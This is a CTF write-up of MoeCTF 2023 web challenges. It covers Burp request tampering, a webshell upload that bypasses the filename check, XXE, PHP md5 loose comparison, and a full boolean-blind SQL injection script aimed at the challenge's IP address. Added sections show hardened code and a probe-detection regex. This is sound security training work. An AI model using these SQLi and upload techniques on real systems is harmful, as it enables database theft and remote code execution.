MoeCTF 2023 Web Writeups

MoeCTF 2023 Web writeups (as far as my skills allowed)

1. http

Opening the address shows the following task:

Capture the request in Burp and look at its contents:

Modify the request as follows:

The response returns the flag.

2. Web入门指北 (Web getting-started guide)

Decode it to get the flag.

3. 彼岸的flag (the flag on the far shore)

View the page source directly to get the flag.

Following the hint in the attached readme,

send POST requests with HackBar to register and log in, and you get the flag.

5. gas!gas!gas!

Well, well, well. For this one I think my connection was too poor for the script to finish. 😭

Just write a script and run it. My own script did not finish (even though it looked fine to me), and a script another player had solved it with did not finish for me either.

Appendix 1: my script

```python
import requests

# The five messages the game can show (kept for reference; not used below)
s1 = "弯道直行,保持这个速度"
s2 = "弯道直行,抓地力太小了!"
s3 = "弯道向左,保持这个速度"
s4 = "弯道向左,抓地力太大了!"
s5 = "弯道向右,抓地力太大了!"

url = "http://localhost:63648/"

p = {
    "driver": "admin",
    "steering_control": "0",
    "throttle": "2",
}

r = requests.post(url, data=p)
# The session cookie comes back in Set-Cookie as "session=<value>; ..."; keep only the value
session = r.headers.get("Set-Cookie")
session1 = {"session": session[8:].split(";")[0]}
r1 = r.text
# print(r1)

for i in range(5):
    # The game message sits at a fixed offset in the returned HTML
    if r1[2308:2320].find("弯道向左") != -1:
        p["steering_control"] = "1"
    elif r1[2308:2320].find("弯道向右") != -1:
        p["steering_control"] = "-1"
    else:
        p["steering_control"] = "0"
    if r1[2308:2320].find("抓地力太大了") != -1:
        p["throttle"] = "2"
    elif r1[2308:2320].find("保持这个速度") != -1:
        p["throttle"] = "1"
    else:
        p["throttle"] = "0"
    r = requests.post(url, data=p, cookies=session1)
    r1 = r.text
    print(r1)
print(r1)
```

Appendix 2: another player's script

```python
import requests
from bs4 import BeautifulSoup


def get_info_from_html(html):
    soup = BeautifulSoup(html, 'html.parser')
    info_div = soup.find('div', {'id': 'info'})
    if info_div:
        return info_div.text
    else:
        return None


def send_post_request(steering_control, throttle, cookie=None):
    url = "http://localhost:55523/"

    headers = {
        "accept": "text/html",
        "content-type": "application/x-www-form-urlencoded",
    }

    data = {
        "driver": "Linmu",
        "steering_control": steering_control,
        "throttle": throttle
    }

    if cookie:
        headers["cookie"] = cookie

    response = requests.post(url, headers=headers, data=data)

    soup = BeautifulSoup(response.text, 'html.parser')
    info_div = soup.find('div', id='info')
    content = info_div.get_text() if info_div else None

    # Take the Set-Cookie header value returned by the server
    server_cookie = response.headers.get('Set-Cookie', None)

    return content, server_cookie


"""
<select id="steering_control" name="steering_control" required="">
<option value="-1">左</option>
<option value="0" selected="">直行</option>
<option value="1">右</option>
</select>
<select id="throttle" name="throttle" required="">
<option value="0">松开</option>
<option value="1">保持</option>
<option value="2" selected="">全开</option>
</select>
"""

content, cookie = send_post_request("0", "2")
print(content)

while content is not None:   # stop when the page no longer has the info div
    if "弯道向右" in content:
        steering_control = "-1"
    elif "弯道向左" in content:
        steering_control = "1"
    else:
        steering_control = "0"

    if "抓地力太小了" in content:
        throttle = "0"
    elif "抓地力太大了" in content:
        throttle = "2"
    else:
        throttle = "1"

    # Unpack the tuple; keep the previous cookie when the server sends no new one
    content, new_cookie = send_post_request(steering_control, throttle, cookie)
    if new_cookie:
        cookie = new_cookie
    print(content)
```
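Added example (mine, not from the original post or from either script's author): the same game loop with the two fragile parts of the scripts above replaced. The message is read from `<div id="info">` with a small standard-library HTML parser instead of a fixed string offset, and the session cookie is kept by a `CookieJar` instead of being sliced out of the `Set-Cookie` header, so the block needs nothing beyond the Python standard library. The URL, driver name and round limit are assumptions; the message-to-option mapping is copied from the two scripts above (弯道向左 → `1`, 弯道向右 → `-1`), so check it against the form's `<select>` values before relying on it.

```python
import urllib.parse
import urllib.request
from html.parser import HTMLParser
from http.cookiejar import CookieJar


class InfoDivParser(HTMLParser):
    """Collect the text inside <div id="info"> ... </div>, nested divs included."""

    def __init__(self):
        super().__init__()
        self.depth = 0        # > 0 while inside the info div
        self.found = False
        self.parts = []

    def handle_starttag(self, tag, attrs):
        if self.depth:
            if tag == "div":
                self.depth += 1
        elif tag == "div" and dict(attrs).get("id") == "info":
            self.depth = 1
            self.found = True

    def handle_endtag(self, tag):
        if self.depth and tag == "div":
            self.depth -= 1

    def handle_data(self, data):
        if self.depth:
            self.parts.append(data)


def extract_info(html):
    """Return the text of div#info, or None when the page has no such div."""
    parser = InfoDivParser()
    parser.feed(html)
    return "".join(parser.parts).strip() if parser.found else None


# Message fragment -> form value. Copied from the two scripts above; verify against the form.
STEER = {"弯道向左": "1", "弯道向右": "-1"}           # default "0" = 直行
THROTTLE = {"抓地力太大了": "2", "抓地力太小了": "0"}  # default "1" = 保持


def decide(info):
    """Map the game's message to (steering_control, throttle) form values."""
    steering = "0"
    for fragment, value in STEER.items():
        if fragment in info:
            steering = value
    throttle = "1"
    for fragment, value in THROTTLE.items():
        if fragment in info:
            throttle = value
    return steering, throttle


def play(url, driver="admin", max_rounds=100):
    """Run the game loop; the cookie jar stores and resends the session cookie."""
    jar = CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    steering, throttle = "0", "2"         # first request: straight, full throttle
    html = ""
    for _ in range(max_rounds):
        form = {"driver": driver, "steering_control": steering, "throttle": throttle}
        body = urllib.parse.urlencode(form).encode()
        with opener.open(url, data=body) as resp:
            html = resp.read().decode("utf-8", "replace")
        if "moectf{" in html:             # flag format used by this CTF
            break
        info = extract_info(html)
        if info is None:                  # no message: the round ended or the page changed
            break
        steering, throttle = decide(info)
        print(info, "->", steering, throttle)
    return html


if __name__ == "__main__":
    print(play("http://localhost:63648/"))   # assumed address; adjust to your instance
```

`extract_info` and `decide` are pure functions, so the parsing and the decision rule can be checked against saved HTML without a running instance; only `play` touches the network.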

6. moe图床 (moe image host)

Reading the page source shows that JavaScript restricts the upload file type on the front end, and that the actual handling is done by upload.php.

Visit upload.php and read its source.

The source checks the Content-Type, so capture the request and change it to image/png.

PHP's explode() splits its second argument into an array using the first argument as the delimiter.

The source also takes $secondSegment=$fileNameParts[1], so only the second element of the array is checked; renaming the file to .png.php bypasses the check.

Delete the relevant JavaScript, redefine the function in the browser console, and upload the webshell.

The response returns the file location (the current directory is html).

Connect with AntSword to get the flag.
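Added example (mine, not the challenge's PHP): the weak filename check rewritten in Python so the flaw sits next to a hardened version. `weak_check` mirrors `explode('.', $fileName)` followed by a test on `$fileNameParts[1]` only; `strong_check` allows exactly one extension, reads it from the end of the name, and confirms that the file's leading bytes match the claimed type. The allowlist and the signature table are constructed for this example.

```python
import hashlib
import re

# Upload rules assumed for this example
ALLOWED = {"png", "jpg", "jpeg", "gif"}
MAGIC = {                                    # constructed table of leading bytes per type
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def weak_check(filename):
    """Python rendering of the flawed logic: explode('.', name), then look at index 1 only."""
    parts = filename.split(".")              # PHP explode('.', $fileName)
    if len(parts) < 2:
        return False
    second_segment = parts[1]                # $secondSegment = $fileNameParts[1]
    return second_segment.lower() in ALLOWED  # "shell.png.php" passes: parts[1] is "png"


def strong_check(filename, content):
    """Hardened rule: a single extension read from the END of the name, plus a signature check."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path component
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+", name):
        return False                         # exactly one dot, safe characters only
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False
    return content.startswith(MAGIC[ext])   # the bytes must match the claimed type


def stored_name(filename, content):
    """Server-chosen name for an accepted upload, or None; the client's name is never reused."""
    if not strong_check(filename, content):
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    return hashlib.sha256(content).hexdigest()[:16] + "." + ext
```

The point of `stored_name` is that the web server's handler choice is driven by the name on disk, so the name must come from the server and carry only the extension that was validated.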

7. 了解你的座驾 (know your ride)

Open any car and capture the request to see its contents.

The request contains XML, so guess XML external entity (XXE) injection.

URL-encode the payload, put it back into Burp, send it, and get the flag.

8. meo图床 (meo image host)

This looks a lot like moe图床, but now upload.php cannot be read.

Let's upload a normal image first and see.

Viewing it, the URL carries a parameter.

So try whether the flag can be read directly.

The response mentions a file Fl3g_n0t_Here_dont_peek!!!!!.php.

Let's see what is in it.

The md5 values are compared with ==, which is loose comparison, so the strings only need to agree in their leading numeric part.

Pick any two inputs whose md5 hashes start with 0, submit them, and get the flag.
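Added example (mine, not the challenge's PHP): a Python emulation of PHP's string `==` next to the strict comparison the code should have used. PHP treats both operands as numbers only when each one is a numeric string in its entirety (optional sign, digits, optional decimal point, optional exponent); a 32-character md5 digest of the form `0e` followed only by digits is such a string and evaluates to zero, which is why two unequal digests can compare equal. `challenge_check` has the shape of the check described above; the digest-shaped strings in the test are constructed, not real hashes.

```python
import hashlib
import hmac
import re

# PHP's numeric-string grammar: optional whitespace, optional sign, integer or decimal,
# optional exponent. Anything else after the number (e.g. "0e12abc") makes it non-numeric.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equal(a, b):
    """Emulate PHP's == between two strings: numeric strings are compared as numbers."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)       # "0e123" and "0e456" are both 0.0
    return a == b


def php_strict_equal(a, b):
    """What === (or hash_equals) does: same characters, no type juggling, constant time."""
    return hmac.compare_digest(a.encode(), b.encode())


def challenge_check(param1, param2, compare):
    """Shape of the challenge's test: different inputs whose md5 digests compare equal."""
    if param1 == param2:
        return False
    d1 = hashlib.md5(param1.encode()).hexdigest()
    d2 = hashlib.md5(param2.encode()).hexdigest()
    return compare(d1, d2)
```

Swapping `php_loose_equal` for `php_strict_equal` in `challenge_check` is the whole fix: hex digests are then compared character by character, and the "0e" special case disappears.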

9. 出去旅游的心海 (Kokomi on holiday)

After entering the WordPress site, notice the small visitor register on the right.

The page source shows that JavaScript sends data obtained from an API to wp-content/plugins/visitor-logging/logger.php.

Visit it.

This is clearly SQL injection; start from the time field.

The response reports whether the insert succeeded or failed, which gives boolean-based blind injection.

The script is as follows:

```python
import requests

url = "http://101.42.178.83:7770/wordpress/wp-content/plugins/visitor-logging/logger.php"
p = {
    "ip": "111",
    "user_agent": "111",
    "time": "222 and length(database())={}",
}

# Step 1: length of the database name
# for i in range(30):
#     p = {
#         "ip": "111",
#         "user_agent": "111",
#         "time": f"null and length(database())={i})#",
#     }
#     r = requests.post(url, data=p)
#     r1 = r.text
#     print(r1)
#     print(r1.count("成功"))
#     if r1.count("成功") == 4:
#         print(i)
#         break


# Step 2: the database name, one character at a time
# for j in range(1000):
#     str1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*."
#     for k in str1:
#         p = {
#             "ip": "111",
#             "user_agent": "111",
#             "time": f"null and substr(database(),{j},1)='{k}')#",
#         }
#         r = requests.post(url, data=p)
#         r1 = r.text
#         if r1.count("成功") == 4:
#             print(k)
#             break

# Step 3: length of the concatenated table names
# for i in range(300):
#     p = {
#         "ip": "111",
#         "user_agent": "111",
#         "time": f"null and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))={i})#",
#     }
#     r = requests.post(url, data=p)
#     r1 = r.text
#     if r1.count("成功") == 4:
#         print(i, end='')
#         break

# Step 4: column names of secret_of_kokomi
# for j in range(1, 206):
#     str1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*."
#     for k in str1:
#         p = {
#             "ip": "111",
#             "user_agent": "111",
#             "time": f"null and substr((select group_concat(column_name) from information_schema.columns where table_name='secret_of_kokomi' and table_schema=database()),{j},1)='{k}')#",
#         }
#         r = requests.post(url, data=p)
#         r1 = r.text
#         if r1.count("成功") == 4:
#             print(k, end='')
#             break

# Step 5: the content column, one character at a time (binary makes the match case-sensitive)
for j in range(1, 3506):
    str1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.{}"
    for k in str1:
        p = {
            "ip": "111",
            "user_agent": "111",
            "time": f"null and binary substr((select content from secret_of_kokomi limit 2,1),{j},1)='{k}')#",
        }
        r = requests.post(url, data=p)
        r1 = r.text
        if r1.count("成功") == 4:
            print(k, end='')
            break

# moectf{Dig_Thr0ugh_Eve2y_C0de_3nd_Poss1bIlIti3s!!}
```

Actually there is no need to find the string length first; just set a large length and run it. (
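Added example (mine; the plugin's real code is not on the page): the logger's insert written twice against an in-memory SQLite table, showing how a value pasted into the statement changes its meaning and how placeholders keep it inert, plus a small pattern match that flags request fields shaped like the probes in the script above. The table name, column names and sample values are constructed; SQLite stands in for MySQL, so the `#` comment syntax and `database()` used by the probes are not exercised here.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for the plugin's visitor table (table and columns constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visitors (ip TEXT, user_agent TEXT, time TEXT)")
    return conn


def log_visit_unsafe(conn, ip, user_agent, time):
    """The weak pattern: request fields pasted into the SQL text."""
    sql = (f"INSERT INTO visitors (ip, user_agent, time) "
           f"VALUES ('{ip}', '{user_agent}', '{time}')")
    conn.execute(sql)
    conn.commit()


def log_visit_safe(conn, ip, user_agent, time):
    """Hardened: placeholders, so the value travels as data and is never parsed as SQL."""
    conn.execute("INSERT INTO visitors (ip, user_agent, time) VALUES (?, ?, ?)",
                 (ip, user_agent, time))
    conn.commit()


def insert_outcome(func, conn, time_value):
    """True when the insert succeeds, False when it errors: the signal the blind probe reads."""
    try:
        func(conn, "111", "111", time_value)
        return True
    except sqlite3.Error:
        return False


def stored_times(conn):
    return [row[0] for row in conn.execute("SELECT time FROM visitors")]


# Tokens that appear in the probes of the script above; a cheap log or WAF rule for this endpoint
_PROBE = re.compile(r"(?i)\b(substr|length|database|information_schema|group_concat)\s*\(|\)\s*#")


def looks_like_probe(value):
    """Flag a request field that resembles a boolean-blind probe (detection, not proof)."""
    return bool(_PROBE.search(value))
```

The success/failure signal that the writeup counts with `r1.count("成功")` is exactly what `insert_outcome` returns; with the parameterised insert the outcome no longer depends on the content of the field, so the oracle the blind probe relies on is gone. The `looks_like_probe` rule is a detection aid for logs of this endpoint, not a substitute for the placeholders.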


MoeCTF 2023 Web Writeups
http://example.com/2023/09/18/MoeCTF-2023-Web部分题解/
Author: Ec0y
Published: 18 September 2023
License